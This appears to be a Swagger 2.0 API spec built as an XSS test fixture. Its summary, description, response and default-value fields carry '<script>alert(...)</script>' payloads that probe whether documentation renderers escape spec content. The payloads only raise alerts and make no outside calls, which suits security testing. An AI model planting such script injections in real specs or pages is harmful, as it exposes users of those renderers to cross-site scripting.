swagger: "2.0"
info:
  description: "XSS test payload"
  version: "1.0.0"
  title: "Swagger XSSstore"
schemes:
- "https"
- "http"
paths:
  /xss:
    get:
      tags:
      - "pet"
      summary: "get XSS payload <script>alert(‘xss');</script>"
      description: "<script>alert(‘xss');</script>"
      operationId: "get"
      consumes:
      - "application/json"
      - "application/xml"
      produces:
      - "application/xml"
      - "application/json"
      responses:
        "200":
          description: "successful operation <script>alert(‘200');</script>"
definitions:
  string:
    description: "String"
    default: "<script>alert(‘xss');</script>"
  XSSObject:  # move to/models/model.yml
      type: object
      description: xssobj
      properties:
        prop:
          type: string
          default: "<script>alert(‘prop');</script>"
